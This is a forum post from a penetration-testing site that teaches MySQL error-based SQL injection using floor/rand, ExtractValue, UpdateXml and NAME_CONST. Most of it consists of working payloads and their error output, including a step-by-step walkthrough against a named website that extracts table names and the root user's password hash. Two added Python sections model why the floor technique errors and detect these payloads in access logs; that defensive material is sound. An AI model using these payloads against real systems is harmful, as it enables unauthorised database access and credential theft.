中国网络渗透测试联盟
Title: MySQL error-based injection: exploiting the floor, ExtractValue and UpdateXml error modes
Author: admin   Time: 2015-11-11 19:03
1. Error via floor
Any of the following payloads can be used:
and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));
Example:
First, a normal query:
mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+
If the id parameter is injectable, the following statement triggers the error:
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
As you can see, the MySQL version is disclosed in the duplicate-entry error. To query other data, replace the version() expression with the subquery you want to read.
For example, to retrieve the administrator user name and password:
Method 1:
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
Method 2:
mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
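The duplicate-entry error above comes from how MySQL fills the GROUP BY temporary table: the key is evaluated once to look it up and, if absent, again to insert it. The following Python model is an added example, not code from the original post; it assumes only the documented first values of floor(rand(0)*2) and reproduces the exact error text shown above, including the fact that a driving table with fewer than three rows produces no error at all.

```python
# Added example (not from the original post): a Python model of why
# "count(*) ... group by concat(x, floor(rand(0)*2))" raises ERROR 1062.
# MySQL evaluates the GROUP BY key once to look it up in the temporary
# result table and, when the key is absent, evaluates it AGAIN to insert
# it. With a non-constant key the two evaluations can differ, so a key
# that was just found to be absent can collide with an existing row.

# rand(0) is seeded, so floor(rand(0)*2) yields the same sequence in every
# session; its first values are 0, 1, 1, 0, 1, 1 (documented behaviour).
# Five draws are consumed before the collision, so six values suffice.
RAND0_FLOOR_SEQUENCE = [0, 1, 1, 0, 1, 1]


class DuplicateEntryError(Exception):
    """Stands in for MySQL's ERROR 1062 (23000): Duplicate entry."""


def group_by_with_unstable_key(prefix, key_values, row_count):
    """Model GROUP BY aggregation over `row_count` rows of the driving table.

    `prefix` is what the injected concat() prepends to the key (the result
    of version(), or of the subquery being read); `key_values` is the
    sequence floor(rand(0)*2) produces. Returns {group_key: count}, or
    raises DuplicateEntryError where MySQL would.
    """
    draws = iter(key_values)
    table = {}
    for _ in range(row_count):
        key = f"{prefix}{next(draws)}"      # first evaluation: the lookup
        if key in table:
            table[key] += 1
            continue
        key = f"{prefix}{next(draws)}"      # second evaluation: the insert
        if key in table:                    # the key changed in between
            raise DuplicateEntryError(
                f"Duplicate entry '{key}' for key 'group_key'")
        table[key] = 1
    return table


def leaked_value(prefix, row_count=3, key_values=RAND0_FLOOR_SEQUENCE):
    """Error text MySQL would echo for the injected query, or None."""
    try:
        group_by_with_unstable_key(prefix, key_values, row_count)
    except DuplicateEntryError as err:
        return str(err)
    return None
```

With a stable key (for example all zeros) the same loop never raises, which is why the rand(0) term is essential to the technique and why information_schema.tables is used as the driving table: it is guaranteed to hold more than two rows.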
2. ExtractValue
Test statement:
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
Actual test:
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
3. UpdateXml
Test statement:
and 1=(updatexml(1,concat(0x3a,(select user())),1))
Actual test:
mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'
More collected examples:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
Error
Duplicate column name '5.0.27-community-nt'
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
Error
Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
Error-based injection trick for newer MySQL versions: injection via NAME_CONST
It's been a while since I've made an SQL Injection tutorial, so I thought I should make a new tutorial using the name_const method. There aren't many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
Related information
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
Code:
NAME_CONST(DATA, VALUE)
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
SELECT NAME_CONST('TEST', 1)
|------|
| TEST |
|------|
|    1 |
|------|
http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables
Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.
Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261
Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
VAR = your MySQL variable.
MySQL 5.1.3 Server System Variables
Let's try it out on my site..
Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
Error
Duplicate column name '5.0.27-community-nt'
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST when trying to extract data. Nothing was wrong with my syntax; it just wouldn't work there. Luckily, it works here, so let's get this going again...
Data Extraction
Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
We should get a duplicate column '1' error.
Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
Error
Duplicate column name '1'
Now let's get the tables out this bitch..
Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
Let's see if it works here; if it does, we can go on and finish the job.
Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
Error
Duplicate column name 'com_admanage'
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.
Let's get the columns out of the user table..
Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
So mine looks like this, and I get the duplicate column name 'Host'.
Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
Error
Duplicate column name 'Host'
Woot, time to finish this bitch off.
Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--
So mine looks like this...
Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--
Error
Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
And there we have it, thanks for reading.
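For the defender's side of all four primitives on this page (floor, extractvalue, updatexml and NAME_CONST), here is an added Python example, not code from the original post, that flags these payloads in web access logs and recovers what an echoed MySQL error actually disclosed. The log lines and client addresses are constructed for the example; the error texts are the ones quoted on this page.

```python
# Added example (not from the original post): flag the error-based SQLi
# primitives on this page in access logs and parse what a leaked MySQL
# error disclosed. Log lines and addresses below are constructed.
import re
from urllib.parse import unquote_plus

# One detector per primitive; requests are URL-decoded before matching.
ERROR_BASED_PATTERNS = {
    "floor": re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
    "extractvalue": re.compile(r"extractvalue\s*\(", re.I),
    "updatexml": re.compile(r"updatexml\s*\(", re.I),
    "name_const": re.compile(r"name_const\s*\(", re.I),
}

# Error messages an application echoes to the client. Group 1 is the
# attacker-chosen string MySQL repeated, i.e. the data actually disclosed.
ERROR_LEAK_PATTERNS = [
    re.compile(r"Duplicate entry '(.*)[01]' for key 'group_key'"),  # floor: strip the 0/1 suffix
    re.compile(r"XPATH syntax error: '.(.*)'"),   # extractvalue/updatexml: strip the 0x5c/0x3a delimiter
    re.compile(r"Duplicate column name '(.*)'"),  # name_const
]

def classify_request(query_string):
    """Names of the error-based primitives present in a URL-encoded query string."""
    decoded = unquote_plus(query_string)
    return [name for name, pat in ERROR_BASED_PATTERNS.items() if pat.search(decoded)]

def leaked_from_error(message):
    """The string an echoed MySQL error disclosed, or None if it is not one of these."""
    for pat in ERROR_LEAK_PATTERNS:
        m = pat.search(message)
        if m:
            return m.group(1)
    return None

def scan_access_log(lines):
    """(client, status, primitives) for each combined-format request carrying a payload."""
    hits = []
    for line in lines:
        m = re.match(r'(\S+) .*"(?:GET|POST) (\S+) [^"]*" (\d{3})', line)
        if m and (found := classify_request(m.group(2))):
            hits.append((m.group(1), int(m.group(3)), found))
    return hits

# Constructed sample log (RFC 5737 addresses): one benign, two injected requests.
SAMPLE_LOG = [
    '198.51.100.7 - - [11/Nov/2015:19:03:01 +0800] "GET /detail.php?id=1 HTTP/1.1" 200 1532',
    '203.0.113.9 - - [11/Nov/2015:19:03:05 +0800] "GET /detail.php?id=1+and+extractvalue(1,concat(0x5c,(select+pass+from+admin+limit+1))) HTTP/1.1" 500 611',
    '203.0.113.9 - - [11/Nov/2015:19:03:09 +0800] "GET /detail.php?id=1+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)-- HTTP/1.1" 500 598',
]
```

A 500 response paired with one of these primitives is the signature to alert on; the real fix is parameterised queries plus never returning database error text to the client, which removes the channel every method on this page depends on.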
Welcome to 中国网络渗透测试联盟 (https://cobjon.com/) | Powered by Discuz! X3.2